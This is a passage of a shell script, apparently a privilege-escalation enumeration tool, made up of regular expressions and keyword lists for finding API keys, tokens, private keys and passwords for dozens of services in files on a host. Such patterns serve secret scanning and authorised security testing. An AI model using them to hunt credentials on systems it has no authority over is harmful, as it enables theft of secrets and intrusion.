  12767     search_for_regex "Artifactory API Key & Password" "[\"']AKC[a-zA-Z0-9]{10,}[\"']|[\"']AP[0-9ABCDEF][a-zA-Z0-9]{8,}[\"']" 
  12768     search_for_regex "Asana Client ID" "((asana[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9]{16})['\"])|((asana[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1
  12769     search_for_regex "Atlassian API Key" "(atlassian[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{24})['\"]" 1
  12770     search_for_regex "AWS Client ID" "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 
  12771     search_for_regex "AWS MWS Key" "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 
  12772     search_for_regex "AWS Secret Key" "aws(.{0,20})?['\"][0-9a-zA-Z\\/+]{40}['\"]" 
  12773     search_for_regex "AWS AppSync GraphQL Key" "da2-[a-z0-9]{26}" 
  12774     search_for_regex "Basic Auth Credentials" "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+" 
  12775     search_for_regex "Beamer Client Secret" "(beamer[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"](b_[a-z0-9=_\\-]{44})['\"]" 1
  12776     search_for_regex "Binance API Key" "(binance[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{64})['\"]" 1
  12777     search_for_regex "Bitbucket Client Id" "((bitbucket[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1
  12778     search_for_regex "Bitbucket Client Secret" "((bitbucket[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9_\\-]{64})['\"])" 1
  12779     search_for_regex "BitcoinAverage API Key" "(bitcoin.?average[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{43})['\"]" 1
  12780     search_for_regex "Bitquery API Key" "(bitquery[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 1
  12781     search_for_regex "Birise API Key" "(bitrise[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9_\\-]{86})['\"]" 1
  12782     search_for_regex "Block API Key" "(block[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4})['\"]" 1
  12783     search_for_regex "Blockchain API Key" "mainnet[a-zA-Z0-9]{32}|testnet[a-zA-Z0-9]{32}|ipfs[a-zA-Z0-9]{32}" 
  12784     search_for_regex "Blockfrost API Key" "(blockchain[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[0-9a-f]{12})['\"]" 1
  12785     search_for_regex "Box API Key" "(box[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1
  12786     search_for_regex "Bravenewcoin API Key" "(bravenewcoin[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{50})['\"]" 1
  12787     search_for_regex "Clearbit API Key" "sk_[a-z0-9]{32}" 
  12788     search_for_regex "Clojars API Key" "(CLOJARS_)[a-zA-Z0-9]{60}" 
  12789     search_for_regex "Cloudinary Basic Auth" "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" 
  12790     search_for_regex "Coinlayer API Key" "(coinlayer[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
  12791     search_for_regex "Coinlib API Key" "(coinlib[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{16})['\"]" 1
  12792     search_for_regex "Contentful delivery API Key" "(contentful[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\\-]{43})['\"]" 1
  12793     search_for_regex "Covalent API Key" "ckey_[a-z0-9]{27}" 
  12794     search_for_regex "Charity Search API Key" "(charity.?search[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
  12795     search_for_regex "Databricks API Key" "dapi[a-h0-9]{32}" 
  12796     search_for_regex "DDownload API Key" "(ddownload[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{22})['\"]" 1
  12797     search_for_regex "Defined Networking API token" "(dnkey-[a-z0-9=_\\-]{26}-[a-z0-9=_\\-]{52})" 
  12798     search_for_regex "Discord API Key, Client ID & Client Secret" "((discord[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-h0-9]{64}|[0-9]{18}|[a-z0-9=_\\-]{32})['\"])" 1
  12799     search_for_regex "Dropbox API Key" "sl.[a-zA-Z0-9_-]{136}" 
  12800     search_for_regex "Doppler API Key" "(dp\\.pt\\.)[a-zA-Z0-9]{43}" 
  12801     search_for_regex "Dropbox API secret/key, short & long lived API Key" "(dropbox[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{15}|sl\\.[a-z0-9=_\\-]{135}|[a-z0-9]{11}(AAAAAAAAAA)[a-z0-9_=\\-]{43})['\"]" 1
  12802     search_for_regex "Duffel API Key" "duffel_(test|live)_[a-zA-Z0-9_-]{43}" 
  12803     search_for_regex "Dynatrace API Key" "dt0c01\\.[a-zA-Z0-9]{24}\\.[a-z0-9]{64}" 
  12804     search_for_regex "EasyPost API Key" "EZAK[a-zA-Z0-9]{54}" 
  12805     search_for_regex "EasyPost test API Key" "EZTK[a-zA-Z0-9]{54}" 
  12806     search_for_regex "Etherscan API Key" "(etherscan[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{34})['\"]" 
  12807     search_for_regex "Facebook Access Token" "EAACEdEose0cBA[0-9A-Za-z]+" 
  12808     search_for_regex "Facebook Client ID" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" 
  12809     search_for_regex "Facebook Oauth" "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" 
  12810     search_for_regex "Facebook Secret Key" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" 
  12811     search_for_regex "Fastly API Key" "(fastly[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\\-]{32})['\"]" 1
  12812     search_for_regex "Finicity API Key & Client Secret" "(finicity[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32}|[a-z0-9]{20})['\"]" 1
  12813     search_for_regex "Flutterweave Keys" "FLWPUBK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST[a-hA-H0-9]{12}" 
  12814     search_for_regex "Frame.io API Key" "fio-u-[a-zA-Z0-9_=\\-]{64}" 
  12815     search_for_regex "Github" "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" 
  12816     search_for_regex "Github App Token" "(ghu|ghs)_[0-9a-zA-Z]{36}" 
  12817     search_for_regex "Github OAuth Access Token" "gho_[0-9a-zA-Z]{36}" 
  12818     search_for_regex "Github Personal Access Token" "ghp_[0-9a-zA-Z]{36}" 
  12819     search_for_regex "Github Refresh Token" "ghr_[0-9a-zA-Z]{76}" 
  12820     search_for_regex "GitHub Fine-Grained Personal Access Token" "github_pat_[0-9a-zA-Z_]{82}" 
  12821     search_for_regex "Gitlab Personal Access Token" "glpat-[0-9a-zA-Z\\-]{20}" 
  12822     search_for_regex "GitLab Pipeline Trigger Token" "glptt-[0-9a-f]{40}" 
  12823     search_for_regex "GitLab Runner Registration Token" "GR1348941[0-9a-zA-Z_\\-]{20}" 
  12824     search_for_regex "GoCardless API Key" "live_[a-zA-Z0-9_=\\-]{40}" 
  12825     search_for_regex "GoFile API Key" "(gofile[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1
  12826     search_for_regex "Google API Key" "AIza[0-9A-Za-z_\\-]{35}" 
  12827     search_for_regex "Google Cloud Platform API Key" "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\\-]{35}]['\"]" 
  12828     search_for_regex "Google Drive Oauth" "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" 
  12829     search_for_regex "Google Oauth Access Token" "ya29\\.[0-9A-Za-z_\\-]+" 
  12830     search_for_regex "Google (GCP) Service-account" "\"type.+:.+\"service_account" 
  12831     search_for_regex "Grafana API Key" "eyJrIjoi[a-z0-9_=\\-]{72,92}" 1
  12832     search_for_regex "Grafana cloud api token" "glc_[A-Za-z0-9\\+/]{32,}={0,2}" 
  12833     search_for_regex "Grafana service account token" "(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})" 
  12834     search_for_regex "Hashicorp Terraform user/org API Key" "[a-z0-9]{14}\\.atlasv1\\.[a-z0-9_=\\-]{60,70}" 
  12835     search_for_regex "Heroku API Key" "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" 
  12836     search_for_regex "Hubspot API Key" "['\"][a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12}['\"]" 1
  12837     search_for_regex "Instatus API Key" "(instatus[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
  12838     search_for_regex "Intercom API Key & Client Secret/ID" "(intercom[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_]{60}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1
  12839     search_for_regex "Ionic API Key" "(ionic[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"](ion_[a-z0-9]{42})['\"]" 1
  12840     search_for_regex "Jenkins Creds" "<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" 
  12841     search_for_regex "JSON Web Token" "(ey[0-9a-z]{30,34}\\.ey[0-9a-z\\/_\\-]{30,}\\.[0-9a-zA-Z\\/_\\-]{10,}={0,2})" 
  12842     search_for_regex "Linear API Key" "(lin_api_[a-zA-Z0-9]{40})" 
  12843     search_for_regex "Linear Client Secret/ID" "((linear[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"])" 
  12844     search_for_regex "LinkedIn Client ID" "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" 
  12845     search_for_regex "LinkedIn Secret Key" "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" 
  12846     search_for_regex "Lob API Key" "((lob[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]((live|test)_[a-f0-9]{35})['\"])|((lob[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]((test|live)_pub_[a-f0-9]{31})['\"])" 1
  12847     search_for_regex "Lob Publishable API Key" "((test|live)_pub_[a-f0-9]{31})" 
  12848     search_for_regex "MailboxValidator" "(mailbox.?validator[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{20})['\"]" 1
  12849     search_for_regex "Mailchimp API Key" "[0-9a-f]{32}-us[0-9]{1,2}" 
  12850     search_for_regex "Mailgun API Key" "key-[0-9a-zA-Z]{32}'" 
  12851     search_for_regex "Mailgun Public Validation Key" "pubkey-[a-f0-9]{32}" 
  12852     search_for_regex "Mailgun Webhook signing key" "[a-h0-9]{32}-[a-h0-9]{8}-[a-h0-9]{8}" 
  12853     search_for_regex "Mandrill API Key" "md-[A-Za-z0-9]{22}" 
  12854     search_for_regex "Mapbox API Key" "(pk\\.[a-z0-9]{60}\\.[a-z0-9]{22})" 1
  12855     search_for_regex "MessageBird API Key & API client ID" "(messagebird[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{25}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1
  12856     search_for_regex "Microsoft Teams Webhook" "https:\\/\\/[a-z0-9]+\\.webhook\\.office\\.com\\/webhookb2\\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}@[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}\\/IncomingWebhook\\/[a-z0-9]{32}\\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}" 
  12857     search_for_regex "New Relic User API Key, User API ID & Ingest Browser API Key" "(NRAK-[A-Z0-9]{27})|((newrelic[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{64})['\"])|(NRJS-[a-f0-9]{19})" 
  12858     search_for_regex "Nownodes" "(nownodes[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 
  12859     search_for_regex "Npm Access Token" "(npm_[a-zA-Z0-9]{36})" 
  12860     search_for_regex "OpenAI API Token" "sk-[A-Za-z0-9]{48}" 
  12861     search_for_regex "ORB Intelligence Access Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" 
  12862     search_for_regex "Pastebin API Key" "(pastebin[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
  12863     search_for_regex "PayPal Braintree Access Token" "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 
  12864     search_for_regex "Picatic API Key" "sk_live_[0-9a-z]{32}" 
  12865     search_for_regex "Pinata API Key" "(pinata[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{64})['\"]" 1
  12866     search_for_regex "Planetscale API Key" "pscale_tkn_[a-zA-Z0-9_\\.\\-]{43}" 
  12867     search_for_regex "PlanetScale OAuth token" "(pscale_oauth_[a-zA-Z0-9_\\.\\-]{32,64})" 
  12868     search_for_regex "Planetscale Password" "pscale_pw_[a-zA-Z0-9_\\.\\-]{43}" 
  12869     search_for_regex "Plaid API Token" "(access-(?:sandbox|development|production)-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" 
  12870     search_for_regex "Prefect API token" "(pnu_[a-z0-9]{36})" 
  12871     search_for_regex "Postman API Key" "PMAK-[a-fA-F0-9]{24}-[a-fA-F0-9]{34}" 
  12872     search_for_regex "Private Keys" "\\-\\-\\-\\-\\-BEGIN PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN RSA PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN OPENSSH PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN PGP PRIVATE KEY BLOCK\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN DSA PRIVATE KEY\\-\\-\\-\\-\\-|\\-\\-\\-\\-\\-BEGIN EC PRIVATE KEY\\-\\-\\-\\-\\-" 
  12873     search_for_regex "Pulumi API Key" "pul-[a-f0-9]{40}" 
  12874     search_for_regex "PyPI upload token" "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_\\-]{50,}" 
  12875     search_for_regex "Quip API Key" "(quip[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{15}=\\|[0-9]{10}\\|[a-zA-Z0-9\\/+]{43}=)['\"]" 1
  12876     search_for_regex "Rubygem API Key" "rubygems_[a-f0-9]{48}" 
  12877     search_for_regex "Readme API token" "rdme_[a-z0-9]{70}" 
  12878     search_for_regex "Sendbird Access ID" "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" 
  12879     search_for_regex "Sendgrid API Key" "SG\\.[a-zA-Z0-9_\\.\\-]{66}" 
  12880     search_for_regex "Sendinblue API Key" "xkeysib-[a-f0-9]{64}-[a-zA-Z0-9]{16}" 
  12881     search_for_regex "Shippo API Key, Access Token, Custom Access Token, Private App Access Token & Shared Secret" "shippo_(live|test)_[a-f0-9]{40}|shpat_[a-fA-F0-9]{32}|shpca_[a-fA-F0-9]{32}|shppa_[a-fA-F0-9]{32}|shpss_[a-fA-F0-9]{32}" 
  12882     search_for_regex "Sidekiq Secret" "([a-f0-9]{8}:[a-f0-9]{8})" 
  12883     search_for_regex "Sidekiq Sensitive URL" "([a-f0-9]{8}:[a-f0-9]{8})@(?:gems.contribsys.com|enterprise.contribsys.com)" 
  12884     search_for_regex "Slack Token" "xox[baprs]-([0-9a-zA-Z]{10,48})?" 
  12885     search_for_regex "Slack Webhook" "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" 
  12886     search_for_regex "Smarksheel API Key" "(smartsheet[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{26})['\"]" 1
  12887     search_for_regex "Square Access Token" "sqOatp-[0-9A-Za-z_\\-]{22}" 
  12888     search_for_regex "Square API Key" "EAAAE[a-zA-Z0-9_-]{59}" 
  12889     search_for_regex "Square Oauth Secret" "sq0csp-[ 0-9A-Za-z_\\-]{43}" 
  12890     search_for_regex "Stytch API Key" "secret-.*-[a-zA-Z0-9_=\\-]{36}" 
  12891     search_for_regex "Stripe Access Token & API Key" "(sk|pk)_(test|live)_[0-9a-z]{10,32}|k_live_[0-9a-zA-Z]{24}" 1
  12892     search_for_regex "Telegram Bot API Token" "[0-9]+:AA[0-9A-Za-z\\\\-_]{33}" 
  12893     search_for_regex "Trello API Key" "(trello[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-z]{32})['\"]" 
  12894     search_for_regex "Twilio API Key" "SK[0-9a-fA-F]{32}" 
  12895     search_for_regex "Twitch API Key" "(twitch[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 
  12896     search_for_regex "Twitter Client ID" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" 
  12897     search_for_regex "Twitter Bearer Token" "(A{22}[a-zA-Z0-9%]{80,100})" 
  12898     search_for_regex "Twitter Oauth" "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\\\s][0-9a-zA-Z]{35,44}['\"\\\\s]" 
  12899     search_for_regex "Twitter Secret Key" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" 
  12900     search_for_regex "Typeform API Key" "tfp_[a-z0-9_\\.=\\-]{59}" 
  12901     search_for_regex "URLScan API Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" 
  12902     search_for_regex "Yandex Access Token" "(t1\\.[A-Z0-9a-z_-]+[=]{0,2}\\.[A-Z0-9a-z_-]{86}[=]{0,2})" 
  12903     search_for_regex "Yandex API Key" "(AQVN[A-Za-z0-9_\\-]{35,38})" 
  12904     search_for_regex "Web3 API Key" "(web3[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9_=\\-]+\\.[A-Za-z0-9_=\\-]+\\.?[A-Za-z0-9_.+/=\\-]*)['\"]" 1
  12905     echo ''
  12906 
  12907     print_2title "Searching Misc"
  12908     search_for_regex "Generic Secret" "[sS][eE][cC][rR][eE][tT].*['\"][0-9a-zA-Z]{32,45}['\"]" 
  12909     search_for_regex "PHP defined password" "define ?\\(['\"](\\w*pass|\\w*pwd|\\w*user|\\w*datab)" 
  12910     search_for_regex "Simple Passwords" "passw.*[=:].+" 
  12911     search_for_regex "Generic API tokens search (A-C)" "(access_key|access_token|account_sid|admin_email|admin_pass|admin_user|adzerk_api_key|algolia_admin_key|algolia_api_key| algolia_search_key|alias_pass|alicloud_access_key|alicloud_secret_key|amazon_bucket_name|amazon_secret_access_key| amazonaws|anaconda_token|android_docs_deploy_token|ansible_vault_password|aos_key|aos_sec| api_key|api_key_secret|api_key_sid|api_secret|apiary_api_key|apigw_access_token|api.googlemaps|AIza|apidocs| apikey|apiSecret|app_bucket_perm|appclientsecret|app_debug|app_id|appkey|appkeysecret|app_key|app_log_level|app_report_token_key| app_secret|app_token|apple_id_password|application_key|appsecret|appspot|argos_token|artifactory_key|artifacts_aws_access_key_id| artifacts_aws_secret_access_key|artifacts_bucket|artifacts_key|artifacts_secret|assistant_iam_apikey|auth0_api_clientsecret| auth0_client_secret|auth_token|authorizationToken|author_email_addr|author_npm_api_key|authsecret|awsaccesskeyid|aws_access| aws_access_key|aws_access_key_id|aws_bucket|aws_config_accesskeyid|aws_key|aws_secret|aws_secret_access_key|awssecretkey| aws_secret_key|aws_secrets|aws_ses_access_key_id|aws_ses_secret_access_key|aws_token|awscn_access_key_id|awscn_secret_access_key| AWSSecretKey|b2_app_key|b2_bucket|bashrc password|bintray_api_key|bintray_apikey|bintray_gpg_password|bintray_key| bintray_token|bintraykey|bluemix_api_key|bluemix_auth|bluemix_pass|bluemix_pass_prod|bluemix_password|bluemix_pwd|bluemix_username brackets_repo_oauth_token|browser_stack_access_key|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id| bucketeer_aws_secret_access_key|built_branch_deploy_key|bundlesize_github_token|bx_password|bx_username|cache_driver| cache_s3_secret_key|cargo_token|cattle_access_key|cattle_agent_instance_auth|cattle_secret_key|censys_secret|certificate_password| cf_password|cheverny_token|chrome_client_secret|chrome_refresh_token|ci_deploy_password|ci_project_url|ci_registry_user| ci_server_name|ci_user_token|claimr_database|claimr_db|claimr_superuser|claimr_token|cli_e2e_cma_token|client_secret| client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key| cloudant_archived_database|cloudant_audited_database|cloudant_database|cloudant_instance|cloudant_order_database| cloudant_parsed_database|cloudant_password|cloudant_processed_database|cloudant_service_database| cloudflare_api_key|cloudflare_auth_email|cloudflare_auth_key|cloudflare_email|cloudinary_api_secret|cloudinary_name| cloudinary_url|cloudinary_url_staging|clu_repo_url|clu_ssh_private_key_base64|cn_access_key_id|cn_secret_access_key| cocoapods_trunk_email|cocoapods_trunk_token|codacy_project_token|codeclimate_repo_token|codecov_token|coding_token| conekta_apikey|conn.login|connectionstring|consumerkey|consumer_key|consumer_secret|contentful_access_token| contentful_cma_test_token|contentful_integration_management_token|contentful_integration_management_token| contentful_management_api_access_token|contentful_management_api_access_token_new|contentful_php_management_test_token| contentful_test_org_cma_token|contentful_v2_access_token|conversation_password|conversation_username|cos_secrets| coveralls_api_token|coveralls_repo_token|coveralls_token|coverity_scan_token|credentials| cypress_record_key)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 
  12912     search_for_regex "Generic API tokens search (D-H)" "(danger_github_api_token|database_host|database_name|database_password|database_port|database_schema_test| database_user|database_username|datadog_api_key|datadog_app_key|db_connection|db_database|db_host|db_password| db_pw|db_server|db_user|db_username|dbpasswd|dbpassword|dbuser|ddg_test_email|ddg_test_email_pw|ddgc_github_token| deploy_password|deploy_secure|deploy_token|deploy_user|dgpg_passphrase|digitalocean_access_token| digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd| docker_password|docker_postgres_url|docker_token|dockerhub_password|dockerhubpassword|doordash_auth_token| dot-files|dotfiles|dropbox_oauth_bearer|droplet_travis_password|dsonar_login|dsonar_projectkey|dynamoaccesskeyid| dynamosecretaccesskey|elastic_cloud_auth|elastica_host|elastica_port|elasticsearch_password|encryption_key| encryption_password|end_user_password|env_github_oauth_token|env_heroku_api_key|env_key|env_secret|env_secret_access_key| env_sonatype_password|eureka_awssecretkey|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey|exp_password| file_password|firebase_api_json|firebase_api_token|firebase_key|firebase_project_develop|firebase_token|firefox_secret| flask_secret_key|flickr_api_key|flickr_api_secret|fossa_api_key|ftp_host|ftp_login|ftp_password|ftp_pw|ftp_user|ftp_username| gcloud_bucket|gcloud_project|gcloud_service_key|gcr_password|gcs_bucket|gh_api_key|gh_email|gh_next_oauth_client_secret| gh_next_unstable_oauth_client_id|gh_next_unstable_oauth_client_secret|gh_oauth_client_secret|gh_oauth_token|gh_repo_token| gh_token|gh_unstable_oauth_client_secret|ghb_token|ghost_api_key|git_author_email|git_author_name|git_committer_email| git_committer_name|git_email|git_name|git_token|github_access_token|github_api_key|github_api_token|github_auth|github_auth_token| github_auth_token|github_client_secret|github_deploy_hb_doc_pass|github_deployment_token|github_hunter_token|github_hunter_username| github_key|github_oauth|github_oauth_token|github_oauth_token|github_password|github_pwd|github_release_token|github_repo| github_token|github_tokens|gitlab_user_email|gogs_password|google_account_type|google_client_email|google_client_id|google_client_secret| google_maps_api_key|google_private_key|gpg_key_name|gpg_keyname|gpg_ownertrust|gpg_passphrase|gpg_private_key|gpg_secret_keys| gradle_publish_key|gradle_publish_secret|gradle_signing_key_id|gradle_signing_password|gren_github_token|grgit_user|hab_auth_token| hab_key|hb_codesign_gpg_pass|hb_codesign_key_pass|heroku_api_key|heroku_email|heroku_token|hockeyapp_token|homebrew_github_api_token| hub_dxia2_password)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 
  12913     search_for_regex "Generic API tokens search (I-R)" "(ij_repo_password|ij_repo_username|index_name|integration_test_api_key|integration_test_appid|internal_secrets| ios_docs_deploy_token|itest_gh_token|jdbc_databaseurl|jdbc_host|jdbc:mysql|jwt_secret|kafka_admin_url|kafka_instance_name|kafka_rest_url| keystore_pass|kovan_private_key|kubecfg_s3_path|kubeconfig|kxoltsn3vogdop92m|leanplum_key|lektor_deploy_password|lektor_deploy_username| lighthouse_api_key|linkedin_client_secretorlottie_s3_api_key|linux_signing_key|ll_publish_url|ll_shared_key|looker_test_runner_client_secret| lottie_happo_api_key|lottie_happo_secret_key|lottie_s3_secret_key|lottie_upload_cert_key_password|lottie_upload_cert_key_store_password| mail_password|mailchimp_api_key|mailchimp_key|mailer_password|mailgun_api_key|mailgun_apikey|mailgun_password|mailgun_priv_key| mailgun_pub_apikey|mailgun_pub_key|mailgun_secret_api_key|manage_key|manage_secret|management_token|managementapiaccesstoken| manifest_app_token|manifest_app_url|mapbox_access_token|mapbox_api_token|mapbox_aws_access_key_id|mapbox_aws_secret_access_key| mapboxaccesstoken|mg_api_key|mg_public_api_key|mh_apikey|mh_password|mile_zero_key|minio_access_key|minio_secret_key|multi_bob_sid| multi_connect_sid|multi_disconnect_sid|multi_workflow_sid|multi_workspace_sid|my_secret_env|mysql_database|mysql_hostname|mysql_password| mysql_root_password|mysql_user|mysql_username|mysqlmasteruser|mysqlsecret|nativeevents|netlify_api_key|new_relic_beta_token|nexus_password| nexuspassword|ngrok_auth_token|ngrok_token|node_env|node_pre_gyp_accesskeyid|node_pre_gyp_github_token|node_pre_gyp_secretaccesskey| non_token|now_token|npm_api_key|npm_api_token|npm_auth_token|npm_email|npm_password|npm_secret_key|npm_token|nuget_api_key|nuget_apikey| nuget_key|numbers_service_pass|oauth_token|object_storage_password|object_storage_region_name|object_store_bucket|object_store_creds| oc_pass|octest_app_password|octest_app_username|octest_password|ofta_key|ofta_region|ofta_secret|okta_client_token|okta_oauth2_client_secret| 